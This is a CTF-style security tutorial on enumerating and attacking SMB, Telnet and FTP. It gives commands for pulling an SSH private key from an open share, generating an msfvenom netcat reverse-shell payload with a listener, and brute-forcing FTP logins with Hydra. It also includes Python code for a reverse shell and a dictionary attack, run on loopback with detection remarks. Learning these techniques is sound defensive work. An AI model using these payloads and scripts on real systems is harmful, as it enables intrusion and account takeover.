# Blue Team Training Series Part 1

###### tags: `cybersecurity` `blue team` `smb` `telnet` `ftp` `hydra`

## Understanding SMB

Server Message Block (SMB) is a client-server communication protocol used for sharing access to files, printers, serial ports, and other resources on a network.

SMB is a request-response protocol: the client and server exchange a sequence of messages (negotiate, session setup, tree connect) to establish a connection before any file operation happens. Historically, clients reached SMB servers over NetBIOS over TCP/IP (RFC 1001 and RFC 1002, TCP port 139), NetBEUI (NetBIOS Extended User Interface) or IPX/SPX (Internetwork Packet Exchange / Sequenced Packet Exchange); modern clients speak SMB directly over TCP port 445.

Once a connection is established, clients send commands (SMBs) to the server that let them access shares, open files, read and write files, and do anything else you would do with a file system.

Every version of Microsoft Windows since Windows 95 has shipped with SMB support. **Samba** is the open source implementation of SMB for *nix systems.

## Enumerating SMB

Enumeration is the process of **gathering information** on a target in order to **find potential attack vectors** and aid in **exploitation**. It is used to collect usernames, passwords, network information, host names, application data, running services, and anything else that is useful to an attacker.

Typically there are SMB shares on a server that can be connected to and used to view or transfer files.

### Steps:

1. Port scanning: using nmap
2. Enum4linux: a tool used to enumerate SMB shares (as well as users, groups, password policy and OS information) on both Windows and Linux systems. It is a wrapper around the tools in the samba package and makes it easy to quickly extract SMB-related information from the target.

**syntax: enum4linux [options] [ip]**, e.g. **enum4linux -a [ip]** runs all of the simple enumeration checks (users, shares, groups, password policy, OS info).

Common shares include:

* netlogon
* profiles
* print$
* IPC$

At times the best way into a system is a security misconfiguration. For SMB, that could be anonymous SMB share access, a common misconfiguration that can leak information leading to a shell.
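To make the "request-response" description concrete, here is an added example (not code from the original notes) of the client's opening message in a modern SMB session: it builds an SMB2 NEGOTIATE request, frames it the way it travels over direct-hosted TCP port 445, and parses the frame back. Field layout and dialect numbers are from MS-SMB2; the client GUID and the `parse_frame` return format are constructed for the example.

```python
"""Added example, not code from the original notes: what the first message of an
SMB request-response exchange looks like on the wire. It builds an SMB2
NEGOTIATE request (the client's opening move), frames it for direct-hosted SMB
over TCP 445 with the 4-byte length header, and parses the frame back.
Field layout and dialect numbers follow MS-SMB2; the client GUID is made up."""
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000          # command code of the NEGOTIATE request
SMB2_HEADER_LEN = 64
# ProtocolId, StructureSize, CreditCharge, Status, Command, CreditRequest,
# Flags, NextCommand, MessageId, Reserved, TreeId, SessionId, Signature
SMB2_HEADER_FMT = "<4sHHIHHIIQIIQ16s"
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1",
            0x0300: "SMB 3.0", 0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}
CLIENT_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")   # constructed value


def smb2_header(command, message_id=0):
    """64-byte SMB2 header for a client request (no tree, no session, unsigned)."""
    return struct.pack(SMB2_HEADER_FMT, SMB2_MAGIC, SMB2_HEADER_LEN, 0, 0,
                       command, 1, 0, 0, message_id, 0, 0, 0, b"\x00" * 16)


def negotiate_request(dialects, signing_required=False, client_guid=CLIENT_GUID):
    """SMB2 NEGOTIATE request: fixed 36-byte part, then 2 bytes per dialect.
    Dialects up to 3.0.2 only; offering 3.1.1 additionally needs negotiate contexts."""
    security_mode = 0x0002 if signing_required else 0x0001   # REQUIRED / ENABLED
    # StructureSize, DialectCount, SecurityMode, Reserved, Capabilities, ClientGuid, ClientStartTime
    body = struct.pack("<HHHHI16sQ", 36, len(dialects), security_mode,
                       0, 0, client_guid.bytes_le, 0)
    body += b"".join(struct.pack("<H", d) for d in dialects)
    return smb2_header(SMB2_NEGOTIATE) + body


def frame_direct_tcp(message):
    """Direct-hosted SMB (TCP 445): a zero byte plus a 24-bit big-endian length.
    Over NetBIOS (TCP 139) a NetBIOS session request would have to come first."""
    if len(message) >= 1 << 24:
        raise ValueError("message too long for the transport header")
    return struct.pack(">I", len(message)) + message


def parse_frame(frame):
    """Check the framing and pull out the interesting header and NEGOTIATE fields."""
    (length,) = struct.unpack(">I", frame[:4])
    message = frame[4:4 + length]
    if len(message) != length or message[:4] != SMB2_MAGIC:
        raise ValueError("not a complete SMB2 message")
    hdr = struct.unpack(SMB2_HEADER_FMT, message[:SMB2_HEADER_LEN])
    info = {"command": hdr[4], "message_id": hdr[8], "length": length, "dialects": []}
    if hdr[4] == SMB2_NEGOTIATE:
        body = message[SMB2_HEADER_LEN:]
        _, count, mode = struct.unpack("<HHH", body[:6])
        codes = struct.unpack("<%dH" % count, body[36:36 + 2 * count])
        info["dialects"] = [DIALECTS.get(c, hex(c)) for c in codes]
        info["signing_required"] = bool(mode & 0x0002)
    return info


if __name__ == "__main__":
    frame = frame_direct_tcp(negotiate_request([0x0202, 0x0210, 0x0300, 0x0302]))
    print(frame.hex())
    print(parse_frame(frame))
```

The bytes this prints are exactly what nmap's SMB scripts and enum4linux's helpers send first when they probe port 445; a server that answers with its own NEGOTIATE response has told you which dialects it speaks and whether it requires signing before any credentials are involved.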
From our enumeration stage we know:

* the SMB server's IP address
* the name of an interesting SMB share

## And the winner is... smbclient

Because we are trying to access an SMB share, we need a client that can talk to the server. Let's use smbclient because it is part of the default samba suite.

**syntax: smbclient //[IP]/[SHARE]** followed by the flags:

* -U [name]: specify the user (for anonymous access use a name such as Anonymous with an empty password, or add -N to skip the password prompt)
* -p [port]: specify the port (default is 445)

#### consider:

* use the get command to download files while in smbclient
* in the case of ssh, you can find the private key in the .ssh directory; it is usually named id_rsa
* **get id_rsa** (downloads the key)
* once you figure out the identity of the user, e.g. johndoe
* you can ssh into the system with: **ssh -i id_rsa johndoe@ip** (run chmod 600 id_rsa first; ssh refuses a key file that other users can read)
* then you go from there

## Understanding Telnet

Telnet is an application protocol that lets a telnet client connect to and issue commands on a remote machine running a telnet server. The telnet client establishes a connection with the server, and the client then becomes a virtual terminal through which you interact with the remote host.

Since Telnet sends everything, including credentials, in clear text and has no security mechanisms of its own, SSH has replaced it.

**syntax: telnet [ip] [port]**

Vulnerabilities that could be trivial to exploit do not always jump out at us, so we need to be thorough in our methodology. You can check telnet's CVEs at:

[cvedetails.com](https://www.cvedetails.com/)
[cve.mitre.org](https://cve.mitre.org/)

A CVE (Common Vulnerabilities and Exposures) entry is a publicly disclosed computer security flaw. Keep in mind that you are far more likely to find a misconfiguration in how telnet has been set up or is operating that will allow you to exploit it.

### The name is shell..
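Before the definitions, an added example (not code from the original notes) of the reverse-shell pattern this section describes, run entirely over the loopback interface: `start_listener()` plays the part of the netcat listener on the attacking machine and `target_connect_back()` plays the part of the payload on the target. The `__END__` marker and the function names are constructed for the example; the real netcat payload has no such marker because a human reads the output interactively.

```python
"""Added example, not code from the original notes: the reverse-shell pattern
over loopback. start_listener() stands in for `nc -lvp PORT` on the attacker;
target_connect_back() stands in for the payload on the target (the
cmd/unix/reverse_netcat one-liner does the same job with mkfifo, nc and
/bin/sh). The target connects OUT to the listener, so no inbound port on the
target is needed, which is why this works through NAT and inbound-only
firewalls. The "__END__" marker is a constructed convention that tells the
attacker where one command's output stops."""
import socket
import subprocess
import threading

END_MARK = b"__END__\n"


def start_listener(host="127.0.0.1"):
    """Attacker side: bind an OS-chosen port and wait for the target to call back."""
    srv = socket.socket()
    srv.bind((host, 0))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def target_connect_back(lhost, lport):
    """Target side: connect to LHOST:LPORT, then read one command per line, run it
    through the local shell and send stdout+stderr back over the same socket."""
    with socket.create_connection((lhost, lport)) as s:
        for raw in s.makefile("rb"):
            cmd = raw.decode("utf-8", "replace").strip()
            if cmd == "exit":
                break
            done = subprocess.run(cmd, shell=True, capture_output=True)
            s.sendall(done.stdout + done.stderr + b"\n" + END_MARK)


def run_session(commands):
    """Wire both halves together on loopback and return each command's output."""
    srv, port = start_listener()
    victim = threading.Thread(target=target_connect_back,
                              args=("127.0.0.1", port), daemon=True)
    victim.start()                       # in real life: paste the payload into telnet
    conn, _ = srv.accept()               # the connection arrives FROM the target
    outputs = []
    with srv, conn:
        reader = conn.makefile("rb")
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            lines = []
            for line in reader:
                if line == END_MARK:
                    break
                lines.append(line)
            outputs.append(b"".join(lines).decode("utf-8", "replace").strip())
        conn.sendall(b"exit\n")
    victim.join(5)
    return outputs


if __name__ == "__main__":
    for out in run_session(["echo reverse-shell-ok", "id"]):
        print(out)
```

Read the two halves side by side and the detection angle falls out: the target process (here `python`, on a real box `nc` or `sh`) makes an outbound TCP connection and then spawns a shell whose stdin and stdout are that socket, which is exactly what endpoint telemetry keyed on "shell with a network socket for stdio" looks for.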
Reverse shell

* A **shell** is a **piece of code or program that gives you command execution on a device**.
* A **reverse shell** is a type of shell in which the **target machine connects back to the attacking machine**.
* The **attacking machine** has a **listening port** on which it **receives the connection**, giving the attacker command execution on the target.

#### listen and listen good ... with tcpdump

* Before launching the shell, confirm that the target can reach you. Capture ICMP on your VPN interface with
* **syntax: tcpdump ip proto \\icmp -i tun0** (note that this is literally 'ip' and not an address)
* then, from the telnet session, ping your tun0 address; if the echo requests show up in tcpdump's output, the target can reach your machine and a reverse shell will be able to connect back

### Get that payday with that msfvenom payload

This will generate a netcat reverse-shell one-liner.

**syntax: msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R**

* -p : payload
* lhost : our local host ip address
* lport : the port to listen on
* R : export the payload in raw format

Start a netcat listener on our local machine:

syntax: **nc -lvp [listening port]**

Once you're listening, paste the payload into the telnet terminal and you have a reverse shell :-)

## Understanding FTP

File Transfer Protocol is used to allow remote transfer of files over a network. It uses a **client-server model** and keeps commands and data on separate connections.

A typical FTP session operates using two channels:

* a command channel, sometimes called the control channel
* a data channel

The command channel carries commands and the replies to those commands. The data channel carries file contents and directory listings.

The **client initiates a connection** with the server, the **server validates** whatever login credentials are provided and **then opens** the session. While the session is open, the client may execute commands on the server.

Servers support **active or passive connections, or both**.

**Active FTP**: the client opens a port and listens.
The **server** is required to **actively connect** to it.

**Passive FTP**: the **server** opens a port and **listens passively**, and the client connects to it.

The separation of command and data channels allows commands to be sent to the server without having to wait for a data transfer to finish.

Exploiting anonymous FTP login to see what files we can access, and whether the information can lead to a shell, is a common CTF method and mimics a real-life careless FTP server deployment.

A common legacy exploit involving in.ftpd can be found here: [Solaris 2.6/7.0 - IN.FTPD CWD 'Username' Enumeration](https://www.exploit-db.com/exploits/20745)

To check for anonymous FTP login:

syntax: **ftp [ip]**, then enter **anonymous** as the username and no password when prompted. A 230 reply means the login was accepted; 530 means it was refused.

## Exploiting FTP

When using FTP both the command and data channels are unencrypted, so data sent over them can be intercepted and read. An attacker on the same network could use ARP poisoning to trick a victim into sending sensitive information, including the FTP credentials, to the attacker instead of the legitimate server. See related article [here.](https://www.jscape.com/blog/bid/91906/Countering-Packet-Sniffers-Using-Encrypted-FTP)

## Enter HYDRA

Hydra is a very fast online password cracking tool which can perform rapid dictionary attacks against more than 50 protocols including telnet, rdp, ssh, ftp, http, smb, several databases and more.

syntax: **hydra -t 4 -l naruto -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp**

* hydra: runs hydra
* -t 4: number of parallel connections per target (a low value such as 4 avoids tripping connection limits on services like ftp and ssh)
* -l [user]: the user whose account you are trying to compromise (use -L [file] for a list of users)
* -P [path to dictionary]: the file containing the list of candidate passwords
* -vV: verbose mode, showing every login attempt
* [machine ip]: the IP address of the target machine
* ftp: the protocol/service module to attack

You can read more about exploitation of remote services [here](https://attack.mitre.org/techniques/T1210/)
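To tie the FTP control-channel description, the anonymous-login check and the Hydra run together, here is an added example (not code from the original notes or from Hydra) that runs all three against a constructed mock FTP server on loopback. `handle_client()` speaks only the login part of the control channel (220, 331, 230, 530, 221), `ftp_login()` is the client side of that dialogue, and `dictionary_attack()` does what the `hydra -l ... -P ... -t 4 ... ftp` line does, with a thread pool standing in for `-t`. The usernames, passwords and wordlist are made up.

```python
"""Added example, not code from the original notes: a loopback model of the FTP
control channel and of what Hydra does to it. handle_client() is a constructed
stand-in for a server's login dialogue (220 banner, USER -> 331, PASS -> 230 or
530); ftp_login() is the client's side of that exchange; anonymous_allowed() is
the anonymous check from the notes; dictionary_attack() is the Hydra run
(-l user, -P wordlist, -t tasks). Users, passwords and the wordlist are made up;
nothing leaves 127.0.0.1."""
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

MOCK_USERS = {"naruto": "rasengan"}     # constructed credentials for the mock server
MOCK_ANONYMOUS = True                    # set False to see the anonymous check fail


def handle_client(conn):
    """Server side of the control channel, login commands only."""
    with conn:
        conn.sendall(b"220 mock FTP service ready\r\n")
        user = None
        for raw in conn.makefile("rb"):
            verb, _, arg = raw.decode("ascii", "replace").rstrip("\r\n").partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user = arg
                conn.sendall(b"331 Password required\r\n")
            elif verb == "PASS":
                ok = MOCK_ANONYMOUS if user == "anonymous" else MOCK_USERS.get(user) == arg
                conn.sendall(b"230 Login successful\r\n" if ok else b"530 Login incorrect\r\n")
            elif verb == "QUIT":
                conn.sendall(b"221 Goodbye\r\n")
                return
            else:
                conn.sendall(b"530 Please login with USER and PASS\r\n")


def start_mock_ftp():
    """Listen on an OS-chosen loopback port; one thread per connection."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(64)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:              # server socket closed
                return
            threading.Thread(target=handle_client, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def ftp_login(host, port, user, password, timeout=5.0):
    """Client side: return True when the server answers with 230 (logged in)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        reader = s.makefile("rb")
        code = int(reader.readline()[:3])            # 220 banner
        if code != 220:
            return False
        s.sendall(f"USER {user}\r\n".encode())
        code = int(reader.readline()[:3])
        if code == 331:                              # server wants a password
            s.sendall(f"PASS {password}\r\n".encode())
            code = int(reader.readline()[:3])
        s.sendall(b"QUIT\r\n")
        return code == 230


def anonymous_allowed(host, port):
    """The 'ftp [ip]' + 'anonymous' + empty password check from the notes."""
    return ftp_login(host, port, "anonymous", "")


def dictionary_attack(host, port, user, wordlist, tasks=4):
    """Hydra-style online attack: try every candidate, `tasks` connections at a time."""
    with ThreadPoolExecutor(max_workers=tasks) as pool:
        results = pool.map(lambda pw: ftp_login(host, port, user, pw), wordlist)
        for password, ok in zip(wordlist, results):
            if ok:
                return password
    return None


WORDLIST = ["123456", "password", "sasuke", "rasengan", "letmein"]   # constructed

if __name__ == "__main__":
    srv, port = start_mock_ftp()
    print("anonymous login allowed:", anonymous_allowed("127.0.0.1", port))
    print("naruto's password:", dictionary_attack("127.0.0.1", port, "naruto", WORDLIST))
    srv.close()
```

Two things worth noticing from the blue-team side: every guess is a full TCP connection plus a USER/PASS pair, so an FTP log fills with `530 Login incorrect` lines from one source in quick succession, and with `-t 4` there are four of them in flight at once. That burst pattern, not any single failed login, is what an alert should key on.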